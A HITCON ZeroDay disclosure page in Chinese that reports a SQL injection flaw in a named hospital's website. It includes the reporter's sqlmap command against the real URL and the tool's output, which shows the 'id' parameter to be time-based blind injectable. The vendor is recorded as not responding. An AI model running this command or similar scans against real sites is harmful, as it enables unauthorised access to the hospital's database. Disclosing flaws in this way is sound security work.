東華醫院存在資料庫注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-01600
  •  發信 Vendor: 東華醫院
  • Title: 東華醫院存在資料庫注入漏洞
  • Introduction: Sql injection

處理狀態

目前狀態

公開
Last Update : 2018/12/21
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/10/21 22:32:13 : 新提交 (由 鄉民 更新此狀態)
  • 2018/10/22 00:01:24 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/10/22 10:31:49 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/10/22 10:31:49 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/12/21 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-01600
  • 通報者:鄉民
  • 風險:中
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://www.dong.org.tw/yiyuan.php?id=24&smallclass=%E9%86%AB%E9%99%A2%E4%BB%8B%E7%B4%B9

敘述

由於我是利用工具(Sqlmap)當腳本小子,因此我不清楚詳細的語法注入為何

但是在參數id上工具寫說存在著漏洞可以注入

應盡快修補
以下是工具的使用過程

root@kali:~# sqlmap -u "http://www.dong.org.tw/yiyuan.php?id=24&smallclass=%E9%86%AB%E9%99%A2%E4%BB%8B%E7%B4%B9" --level=3 --tables


   __H__

[.]__ _ {1.1.11#stable}
| -| . [.] | .'| . |
|
| ["]|||_,| |
||V || http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:42:38

[15:42:38] [INFO] testing connection to the target URL
[15:42:39] [INFO] testing if the target URL is stable
[15:42:40] [INFO] target URL is stable
[15:42:40] [INFO] testing if GET parameter 'id' is dynamic
[15:42:40] [WARNING] GET parameter 'id' does not appear to be dynamic
[15:42:40] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[15:42:40] [INFO] testing for SQL injection on GET parameter 'id'
[15:42:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:42:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[15:43:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:43:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[15:43:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:43:27] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:43:38] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:43:48] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:43:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[15:43:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[15:44:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[15:44:00] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[15:44:01] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'
[15:44:01] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'
[15:44:02] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[15:44:02] [INFO] testing 'Informix boolean-based blind - Parameter replace'
[15:44:02] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'
[15:44:03] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:44:03] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL) (original value)'
[15:44:04] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:44:04] [INFO] testing 'Boolean-based blind - Parameter replace (CASE) (original value)'
[15:44:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:44:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:44:07] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:44:08] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[15:44:08] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[15:44:09] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[15:44:10] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[15:44:17] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'
[15:44:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:44:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:44:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:44:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:44:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[15:45:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[15:45:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:45:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[15:45:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[15:45:22] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:45:27] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:45:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:45:33] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:45:33] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:45:33] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[15:45:33] [INFO] testing 'Oracle error-based - Parameter replace'
[15:45:34] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:45:34] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:45:34] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'
[15:45:35] [INFO] testing 'MySQL inline queries'
[15:45:35] [INFO] testing 'PostgreSQL inline queries'
[15:45:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:45:36] [INFO] testing 'Oracle inline queries'
[15:45:36] [INFO] testing 'SQLite inline queries'
[15:45:36] [INFO] testing 'Firebird inline queries'
[15:45:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[15:45:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:45:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[15:45:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:45:50] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[15:45:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:45:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:45:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[15:46:10] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;